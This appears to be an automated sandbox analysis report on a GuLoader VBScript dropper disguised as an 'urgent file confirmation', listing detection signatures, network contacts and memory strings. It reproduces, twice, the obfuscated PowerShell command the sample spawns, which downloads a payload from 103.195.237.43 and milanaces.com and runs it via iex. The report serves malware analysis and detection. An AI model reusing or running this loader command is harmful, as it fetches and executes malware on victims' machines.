Windows Analysis Report
Urgent_File_Confirmation_00000000000000000000.vbs

Overview

General Information

Sample name:	Urgent_File_Confirmation_00000000000000000000.vbs
Analysis ID:	1466652
MD5:	182b6f3f627a31ed7ca07dac5301a313
SHA1:	10344a8ea462146b923a66accacb6882d5788322
SHA256:	a268983f063d0e933961c93cd3d813a7b8ba94d81789eced7da6a2e3bef32836
Tags:	vbs
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

VBScript performs obfuscated calls to suspicious functions

Yara detected GuLoader

Yara detected Powershell download and execute

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Obfuscated command line found

Potential malicious VBS script found (suspicious strings)

Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)

Sample has a suspicious name (potential lure to open the executable)

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Very long command line found

Wscript starts Powershell (via cmd or directly)

Abnormal high CPU Usage

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

Multi AV Scanner detection for domain / URL

Source: http://103.195.237.43

Virustotal: Detection: 11%

Perma Link

Multi AV Scanner detection for submitted file

Source: Urgent_File_Confirmation_00000000000000000000.vbs	ReversingLabs: Detection: 15%
Source: Urgent_File_Confirmation_00000000000000000000.vbs	Virustotal: Detection: 15%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Source:	Binary string: .Core.pdb@ source: powershell.exe, 00000004.00000002.2993662435.000000000748B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: indows\System.Core.pdb source: powershell.exe, 00000004.00000002.2993662435.000000000748B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbB source: powershell.exe, 00000004.00000002.2993662435.0000000007429000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000004.00000002.2993662435.0000000007429000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 103.195.237.43 103.195.237.43

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /Magnetiseringerne.sea HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.195.237.43Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43

Source: global traffic

HTTP traffic detected: GET /Magnetiseringerne.sea HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.195.237.43Connection: Keep-Alive

Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.1
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.19
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.2
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.23
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.4
Source: powershell.exe, 00000001.00000002.2974919360.0000021E818AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2974919360.0000021E80227000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/M
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Ma
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Mag
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Magn
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Magne
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Magnet
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Magneti
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Magnetis
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Magnetise
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Magnetiser
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Magnetiseri
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Magnetiserin
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Magnetisering
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Magnetiseringe
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Magnetiseringer
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Magnetiseringern
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Magnetiseringerne
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Magnetiseringerne.
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Magnetiseringerne.s
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Magnetiseringerne.se
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2974919360.0000021E80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2975462593.0000000004B75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Magnetiseringerne.sea
Source: powershell.exe, 00000001.00000002.2974919360.0000021E81DD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195H
Source: wscript.exe, 00000000.00000003.1702645545.00000190BA0C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698591176.00000190BA0C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/
Source: wscript.exe, 00000000.00000002.1716920830.00000190B817B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1715607595.00000190B816E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en%
Source: wscript.exe, 00000000.00000002.1716920830.00000190B817B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1715607595.00000190B816E000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1702779163.00000190BA0A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1703727134.00000190BA0A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab.U
Source: wscript.exe, 00000000.00000003.1703727134.00000190BA098000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702779163.00000190BA071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?bd9d9f824a
Source: powershell.exe, 00000001.00000002.3027742300.0000021E90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2984158836.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2975462593.0000000004B75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2993662435.0000000007477000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2974919360.0000021E80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2975462593.0000000004A21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2975462593.0000000004B75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2993662435.0000000007477000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2974919360.0000021E80001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2975462593.0000000004A21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBdq
Source: powershell.exe, 00000004.00000002.2984158836.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2984158836.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2984158836.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.2975462593.0000000004B75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2993662435.0000000007477000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.c
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.co
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.com
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.com/
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.com/M
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.com/Ma
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.com/Mag
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.com/Magn
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.com/Magne
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.com/Magnet
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.com/Magneti
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.com/Magnetis
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.com/Magnetise
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.com/Magnetiser
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.com/Magnetiseri
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.com/Magnetiserin
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.com/Magnetisering
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.com/Magnetiseringe
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.com/Magnetiseringer
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.com/Magnetiseringern
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.com/Magnetiseringerne
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.com/Magnetiseringerne.
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.com/Magnetiseringerne.s
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.com/Magnetiseringerne.se
Source: powershell.exe, 00000001.00000002.2974919360.0000021E8127F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.com/Magnetiseringerne.sea
Source: powershell.exe, 00000004.00000002.2975462593.0000000004B75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.com/Magnetiseringerne.sea0
Source: powershell.exe, 00000001.00000002.2974919360.0000021E818AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2974919360.0000021E80227000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://milanaces.com/Magnetiseringerne.seaX
Source: powershell.exe, 00000001.00000002.3027742300.0000021E90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2984158836.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_7668.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7456, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7668, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Potential malicious VBS script found (suspicious strings)

Source:

Initial file: Call Frkkertens.ShellExecute("P" & skumtppers, Svigermoders, "", "", Dangs237)

Sample has a suspicious name (potential lure to open the executable)

Source: Urgent_File_Confirmation_00000000000000000000.vbs

Static file information: Suspicious name

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 4107
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 4107
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 4107	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 4107	Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'unloveliness Vvestol Shrimpish byrendernes Ristornos33 Estoppel Togaernes Kalkulationskolonnernes Dispatch systematikkerne Hemmelighed Tonical Uncrudded ulyksalighed ugthedens Buddingpulverets Vertebrate Pursuits Partitional Rigsenhedens brugervenlig Hypnotiseres Quinqueradiate Saiga unloveliness Vvestol Shrimpish byrendernes Ristornos33 Estoppel Togaernes Kalkulationskolonnernes Dispatch systematikkerne Hemmelighed Tonical Uncrudded ulyksalighed ugthedens Buddingpulverets Vertebrate Pursuits Partitional Rigsenhedens brugervenlig Hypnotiseres Quinqueradiate Saiga';If (${host}.CurrentCulture) {$Optionally++;}Function Nordvest61($Spaltedefinitionernes){$Defrauding=$Spaltedefinitionernes.Length-$Optionally;$Genskabtes='SUBsTRI';$Genskabtes+='ng';For( $Snakeflower=1;$Snakeflower -lt $Defrauding;$Snakeflower+=2){$unloveliness+=$Spaltedefinitionernes.$Genskabtes.Invoke( $Snakeflower, $Optionally);}$unloveliness;}function Diagonalgade209($Plejninger){ . ($Tantarabobus) ($Plejninger);}$Amtskommunaldirektrens=Nordvest61 ' MPo.zSiIlSlna,/S5 . 0U U(.WSiSn dSopwSs .NFTl 1D0O..0 ; sWOi nE6P4e;B CxO6E4N;S .rSvH:R1 2 1 . 0O)T .G eGc k oT/G2,0V1,0P0S1M0L1M fFTi r.e.fKoBxG/,1M2.1s.C0T ';$Ridestiernes=Nordvest61 'SUPs e,r - ASg,e,n,t. ';$Ristornos33=Nordvest61 ',h t,t p :./F/O1S0 3L.A1R9 5 . 2,3 7f. 4t3M/.MGa g,n e t,i s.e.r iJntg,eSr n eA.Gs.e a >FhStItApTse: /B/Sm i,lSa n a,cJe sB.Vc o m /uM aFg n,e,tui sFePr i n gNe rVnBeO.GsOeHa ';$Diftongeringerne=Nordvest61 '.>S ';$Tantarabobus=Nordvest61 '.iEe x ';$Mugningers157='Kalkulationskolonnernes';$Alluviate = Nordvest61 '.eNcPh.oK P%HaHp,p dPa tIaU%.\ PSaFrMaNp hPyLs i.f,eSrdo u.s ..MDaKk. h& &B eGc hMo Bt ';Diagonalgade209 (Nordvest61 'U$Sg.leo bRaUlM:,rRe k rPu t,sT=K(GcBm d F/ cI $ A,l.lSu vCi,aut e,) ');Diagonalgade209 (Nordvest61 'G$Cg,l,oBbAa l :PbOyAr,eUn.d eLr.n eAs,= $SR,iYs,t oMrLnTo s,3.3K.DsSp l,i t.( $TD isfFt o.nHgCe rUiun g,eOr.nReA)A ');Diagonalgade209 (Nordvest61 'R[ANBe,tA.PSTe rav,i cBeBP o i nAtMMaa,n aCgte,r,]I: :CS eMc,uSr i,t.y,PRrUo,t o cDoDl E=E M[PNOeGt..SSReDc.uMr i t yFPErMout,oBc,o lUTFy pOe ] :.:,T lEsU1U2 ');$Ristornos33=$byrendernes[0];$Konjunkturgevinsterne= (Nordvest61 'D$BgTl oPbEa.l :DUMnPsAubmTpSt.u,oHu.s.l y,=UN eOwK-fO.bFjSeSc tJ FS yCs tme,mF.PNNe.t .HWieLb C l iSeUn t');$Konjunkturgevinsterne+=$rekruts[1];Diagonalgade209 ($Konjunkturgevinsterne);Diagonalgade209 (Nordvest61 ' $ UEnUscuAmTp t.uUo uHsOl,y .UHCe a,dGeHr s [ $TRSiFdSeNs,t,i e,r n.e.s.] =,$UA,m tBs k oAmAmAu n,a,lHd,iRr e kSt rAe.nNsB ');$Packplane223=Nordvest61 ' $ U n s u m.pCt.u o uKs.l.yA.RDDoBwGnBlSoBakdSF iBl.eO( $FR iSs.tNo rSn,oPsM3U3.,O$.HDyUpUn oStAi sIe,r.ePs ) ';$Hypnotiseres=$rekruts[0];Diagonalgade209 (Nordvest61 ',$ gQl o b a.l :SkKlTa,pFsIaLl vReMnA= ( T eDsFtA-,PGaKt hI t$SH,y pHnsoBtSi s ePrCeFsP)V ');while (!$klapsalven) {Diagonalgade209 (Nord
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'unloveliness Vvestol Shrimpish byrendernes Ristornos33 Estoppel Togaernes Kalkulationskolonnernes Dispatch systematikkerne Hemmelighed Tonical Uncrudded ulyksalighed ugthedens Buddingpulverets Vertebrate Pursuits Partitional Rigsenhedens brugervenlig Hypnotiseres Quinqueradiate Saiga unloveliness Vvestol Shrimpish byrendernes Ristornos33 Estoppel Togaernes Kalkulationskolonnernes Dispatch systematikkerne Hemmelighed Tonical Uncrudded ulyksalighed ugthedens Buddingpulverets Vertebrate Pursuits Partitional Rigsenhedens brugervenlig Hypnotiseres Quinqueradiate Saiga';If (${host}.CurrentCulture) {$Optionally++;}Function Nordvest61($Spaltedefinitionernes){$Defrauding=$Spaltedefinitionernes.Length-$Optionally;$Genskabtes='SUBsTRI';$Genskabtes+='ng';For( $Snakeflower=1;$Snakeflower -lt $Defrauding;$Snakeflower+=2){$unloveliness+=$Spaltedefinitionernes.$Genskabtes.Invoke( $Snakeflower, $Optionally);}$unloveliness;}function Diagonalgade209($Plejninger){ . ($Tantarabobus) ($Plejninger);}$Amtskommunaldirektrens=Nordvest61 ' MPo.zSiIlSlna,/S5 . 0U U(.WSiSn dSopwSs .NFTl 1D0O..0 ; sWOi nE6P4e;B CxO6E4N;S .rSvH:R1 2 1 . 0O)T .G eGc k oT/G2,0V1,0P0S1M0L1M fFTi r.e.fKoBxG/,1M2.1s.C0T ';$Ridestiernes=Nordvest61 'SUPs e,r - ASg,e,n,t. ';$Ristornos33=Nordvest61 ',h t,t p :./F/O1S0 3L.A1R9 5 . 2,3 7f. 4t3M/.MGa g,n e t,i s.e.r iJntg,eSr n eA.Gs.e a >FhStItApTse: /B/Sm i,lSa n a,cJe sB.Vc o m /uM aFg n,e,tui sFePr i n gNe rVnBeO.GsOeHa ';$Diftongeringerne=Nordvest61 '.>S ';$Tantarabobus=Nordvest61 '.iEe x ';$Mugningers157='Kalkulationskolonnernes';$Alluviate = Nordvest61 '.eNcPh.oK P%HaHp,p dPa tIaU%.\ PSaFrMaNp hPyLs i.f,eSrdo u.s ..MDaKk. h& &B eGc hMo Bt ';Diagonalgade209 (Nordvest61 'U$Sg.leo bRaUlM:,rRe k rPu t,sT=K(GcBm d F/ cI $ A,l.lSu vCi,aut e,) ');Diagonalgade209 (Nordvest61 'G$Cg,l,oBbAa l :PbOyAr,eUn.d eLr.n eAs,= $SR,iYs,t oMrLnTo s,3.3K.DsSp l,i t.( $TD isfFt o.nHgCe rUiun g,eOr.nReA)A ');Diagonalgade209 (Nordvest61 'R[ANBe,tA.PSTe rav,i cBeBP o i nAtMMaa,n aCgte,r,]I: :CS eMc,uSr 